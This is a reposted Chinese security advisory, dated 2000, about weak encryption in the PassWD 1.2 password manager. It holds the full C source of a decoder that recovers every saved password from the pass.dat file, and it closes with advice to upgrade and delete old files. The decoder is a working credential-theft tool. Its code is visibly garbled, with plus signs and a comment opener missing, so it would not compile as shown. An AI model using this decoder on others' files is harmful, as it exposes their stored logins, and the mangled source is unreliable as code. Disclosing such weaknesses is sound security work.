PassWD 1.2 弱加密漏洞
2008-04-10 03:04:36来源:互联网 阅读 ()
发布日期:2000-06-06
更新日期:2000-06-06
受影响系统:
描述:
PassWD PassWD 1.2
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
PassWd 1.2是一个口令管理工具,用于保存到各种URLs的用户登录信息,比如用
户名、口令以及链接,保存在在PassWD安装目录下的pass.dat文件中。遗憾的是,
这些信息采用了很弱的加密机制保存在pass.dat文件中,存在一个key可以解码
所有被保存的口令。
<* 来源:Daniel Roethlisberger admin@roe.ch *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
* Decoder for PassWD v1.2 `pass.dat' password files
*
* Written 2000 by Daniel Roethlisberger <admin@roe.ch>
*
* This code is hereby placed in the public domain.
* Use this code at your own risk for whatever you want.
*
* The decoded data is not parsed in any way - it should
* be very easy to moderately experienced programmers
* to add that themselves.
*
*/
#include <stdio.h>
void main(int argc, char *argv[])
{
unsigned char charpos;
FILE* outfile;
FILE* infile;
unsigned char a;
unsigned char b;
unsigned char key;
unsigned char x;
unsigned char charset[] = "\b\t\n\r !\"#$%&'()* ,-./0123456789:;<=>?@AB
CDEFGHIJKLMNOPQRSPUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\b\t\n\r !
\"#$%&'()* ,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSPUVWXYZ[\\]^_`abcdef
ghijklmnopqrstuvwxyz{|}~";
printf("\nDecoder for PassWD v1.2 `pass.dat' password files\n");
printf("Written 2000 by Daniel Roethlisberger <admin@roe.ch>\n\n");
if((argc > 3) || (argc < 2))
{
printf("Usage: %s <infile> [<outfile>]\n\n", argv[0]);
printf("If <outfile> is omitted, the output is dumped to stdout.\n", argv[0]);
return;
}
infile = fopen(argv[1], "r");
if(infile == NULL)
{
printf("Could not open file %s\n", argv[1]);
return;
}
if(argc == 2)
outfile = stdout;
else
{
outfile = fopen(argv[2], "w");
if(outfile == NULL)
{
printf("Could not write to file %s\n", argv[2]);
_fcloseall();
return;
}
}
getc(infile); /* jump over decoy byte */
a = getc(infile); /* read encoded key byte 1 */
b = getc(infile); /* read encoded key byte 2 */
if(b == EOF)
{
printf("ERROR - encountered EOF within header\n");
return;
}
/* this line `decodes' the key */
key = (unsigned char)((a - 'b') * 10 (b - 'b'));
/* read through infile and dump decoded output to outfile: */
x = getc(infile);
while(!feof(infile))
{
for(charpos = 0; x != charset[charpos]; charpos )
{
if(charpos > 99)
{
printf("\nERROR - encountered illegal character in source file\n");
_fcloseall();
return;
}
}
/* plain = cypher - key */
putc(charset[charpos 99 - key], outfile);
x = getc(infile);
}
if(argc == 2)
printf("\n\n");
printf("Done.\n");
_fcloseall();
return;
}
建议:
暂时考虑升级到 PassWD 2000 并删除旧的 pass.dat 文件。
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash
